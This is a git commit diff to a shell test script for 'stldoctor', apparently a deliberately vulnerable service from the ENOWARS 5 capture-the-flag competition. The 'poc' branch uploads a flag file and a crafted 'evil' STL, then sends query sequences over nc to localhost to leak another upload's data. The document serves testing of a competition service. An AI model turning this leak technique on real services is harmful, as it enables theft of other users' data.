diff options
| author | Louis Burda <quent.burda@gmail.com> | 2021-05-13 13:55:07 +0200 |
|---|---|---|
| committer | Louis Burda <quent.burda@gmail.com> | 2021-05-13 13:55:07 +0200 |
| commit | 9d4f8aaceda37364748a4be8238ffde4c137a19c (patch) | |
| tree | 0c641bbf257f606503edd04c3d4a1fd1fd559e62 /service/src/test.sh | |
| parent | f1285b65d59119b71c7c4f98dddcf2d6969922be (diff) | |
| download | enowars5-service-stldoctor-9d4f8aaceda37364748a4be8238ffde4c137a19c.tar.gz enowars5-service-stldoctor-9d4f8aaceda37364748a4be8238ffde4c137a19c.zip | |
added cleanup script, improved poc test, addec echo for debugging and small fixes
Diffstat (limited to 'service/src/test.sh')
| -rw-r--r-- | service/src/test.sh | 52 |
1 files changed, 44 insertions, 8 deletions
diff --git a/service/src/test.sh b/service/src/test.sh index 86bce92..f8e7196 100644 --- a/service/src/test.sh +++ b/service/src/test.sh @@ -2,6 +2,11 @@ set -e +RUN_REMOTE=1 + +export RESULTDIR="../data/scans" +export ECHO_INPUT=1 + announce() { count=$(echo "$1" | wc -c) python3 -c " @@ -24,7 +29,13 @@ checkleaks() { fi } -export RESULTDIR="scans" +connect() { + if [ $RUN_REMOTE ]; then + nc localhost 9000 + else + ./printdoc + fi +} if [ "$1" == "stl" ]; then @@ -47,25 +58,47 @@ elif [ "$1" == "poc" ]; then announce "Testing Proof-Of-Concept" - rm -rf scans/* + rm -rf "$RESULTDIR"/* echo -e "\n--- Uploading target STL ---\n" 1>&2 ( + echo "echo" echo "submit" - cat tests/sample-ascii.stl | wc -c - cat tests/sample-ascii.stl - ) | ./printdoc + cat tests/flag1.stl | wc -c + cat tests/flag1.stl + echo "exit" + ) | connect echo -e "\n--- Uploading evil STL ---\n" 1>&2 ( + echo "echo" echo "submit" cat tests/evil1.stl | wc -c cat tests/evil1.stl echo -e "AAAA\xff" - ) | ./printdoc + echo "exit" + ) | connect echo -e "\n--- Testing Exploit ---\n" 1>&2 ( + echo "echo" + + # try index 0 + echo "query" + echo -e "AAAA\xff" + echo "0" + echo "n" + + echo "query" + echo "0" + echo "n" + + # reset cached result + echo "submit" + echo "2" + echo "aa" + + # try index 1 echo "query" echo -e "AAAA\xff" echo "0" @@ -73,7 +106,9 @@ elif [ "$1" == "poc" ]; then echo "query" echo "1" - ) | checkleaks + echo "n" + echo "exit" + ) | connect else ( @@ -81,6 +116,7 @@ else echo "2" echo "AA" echo "AAAA" - ) | ./printdoc + echo "exit" + ) | connect fi |